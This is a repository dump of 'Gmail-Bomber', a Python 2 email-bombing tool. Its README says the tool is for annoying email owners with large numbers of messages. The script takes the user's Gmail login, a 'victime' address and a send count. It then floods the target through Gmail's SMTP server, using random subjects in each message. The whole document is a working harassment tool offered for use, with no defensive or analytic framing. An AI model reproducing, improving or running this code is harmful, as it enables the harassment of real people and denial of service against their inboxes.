├── README.md └── Gmail-Bomber.py /README.md: -------------------------------------------------------------------------------- 1 | # Gmail-Bomber 2 | 3 | # A simple tool to annoy email owners With a large number of messages :) 4 | 5 | [![alt tag](https://e.top4top.net/p_813coywl1.png)] 6 | # How To use : 7 | 1 - Download the tool 8 | 9 | 2 - set the tool file in your Desktop 10 | 11 | 3 - open TERMINAL 12 | 13 | 4 - type : cd Desktop/Gmail-Bomber-master 14 | 15 | 5 - type : python Gmail-Bomber.py 16 | 17 | 6 - set all information , & Enjoy 18 | 19 | 20 | 21 | Fb : Lamani Fodil hani 22 | 23 | -------------------------------------------------------------------------------- /Gmail-Bomber.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 3 | #%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: March 26 , 2018 %%%%%%%%%%%%%%%%%%%%%%%%%%%%% 4 | #%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%% 5 | #%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 6 | #%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 7 | #%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%% 8 | #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 9 | # By : Lamani Fodil Hani (VEGETA-LFH) 10 | # Fb : Lamani Fodil Hani 11 | # Github : www.github.com/lamanihani 12 | # Gmail : lamanihani1@gmail.com 13 | ############################################# Import some lib ############################# 14 | import os 15 | import random 16 | import smtplib 17 | import sys 18 | import getpass 19 | import time 20 | ############################ JUST a SHIT ################### 21 | os.system('clear') 22 | rania1 = (" #do you even \033[91mexist\033[97m ") 23 | rania2 = (''' #Im \033[92mgood\033[97m at reading \033[93mpeople 24 | \033[97mMy \033[91msecret\033[97m ? I look for the \033[96mworst\033[97m in them\033[97m''') 25 | rania3 = (" #'\033[91mlove \033[97mis foreever' \033[97mbullshit\033[97m") 26 | rania4 = (" #we live in a kingdom of \033[91mbullshit\033[97m") 27 | rania5 = (" #LEAVE ME \033[91mHERE \033[97m!") 28 | rania6 = (" #LEAVE ME \033[91mHERE \033[97m!") 29 | def kf_art(): 30 | arts = [rania1, rania2, rania3,rania4,rania5,rania6] 31 | return random.choice(arts) 32 | print ('''\033[1;31m \033[97m 33 | ________ .__.__ __________ ___. 34 | / _____/ _____ _____ |__| | \______ \ ____ _____\_ |__ ___________ 35 | / \ ___ / |___ \ | | | ______ | | _// _ \ / \| __ \_/ __ \_ __ 36 | \ \_\ \ Y Y \/ __ \| | |__ /_____/ | | ( <_> ) Y Y \ \_\ \ ___/| | \/ 37 | \______ /__|_| (____ /__|____/ |______ /\____/|__|_| /___ /\___ >__| 38 | \/ \/ \/ \/ \/ \/ \/ 39 | By \033[93mVEGETA-LFH \033[97mツ 40 | ''') 41 | print(kf_art()) 42 | print(" ") 43 | ######################### USER INFO ########################## 44 | user = raw_input('\033[94m[?] \033[97mYour \033[92mGmail\033[97m :\033[93m ') 45 | passworde = getpass.getpass('\033[94m[?]\033[97m Your \033[91mPassword\033[97m :\033[93m ') 46 | print(" ") 47 | victime = raw_input('\033[94m[?]\033[97m The victime \033[91mEMAIL\033[97m : \033[93m') 48 | message = raw_input('\033[94m[?]\033[97m Your \033[92mMessage\033[97m : \033[93m') 49 | print(" ") 50 | hani = input('\033[94m[?] \033[97mNumber of \033[92msend\033[97m : \033[93m') 51 | print(" ") 52 | print("\033[94m[*] \033[97mSending : ") 53 | ############################### SMTP_SERVER INFO ################## 54 | smtp_server = 'smtp.gmail.com' 55 | port = 587 56 | 57 | ########################## Login ############################ 58 | try: 59 | server = smtplib.SMTP(smtp_server,port) 60 | server.ehlo() 61 | if smtp_server == "smtp.gmail.com": 62 | server.starttls() 63 | server.login(user,passworde) 64 | ###################### SENDING ######################################### 65 | for i in range(1, hani+1): 66 | subject = os.urandom(9) 67 | msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + message 68 | server.sendmail(user,victime,msg) 69 | print ("\033[94m[✔]\033[97m Email \033[92mSENT\033[97m :\033[93m %i") % i 70 | sys.stdout.flush() 71 | server.quit() 72 | print ('\033[93m[✔]\033[97m All \033[97mMessage was\033[92m sent\033[97m ') 73 | 74 | 75 | except KeyboardInterrupt: 76 | print ('[✘] Canceled') 77 | sys.exit() 78 | except smtplib.SMTPAuthenticationError: 79 | print(" ") 80 | print("\033[94m[✘] \033[91mError \033[97m:") 81 | print ('\033[94m[✘] \033[97mThe \033[93musername \033[97mor \033[93mpassword \033[97myou entered is incorrect.') 82 | print ("\033[94m[!] \033[97mCheck if the Options of 'Applications are less secure' is enabled ") 83 | sys.exit() 84 | 85 | 86 | --------------------------------------------------------------------------------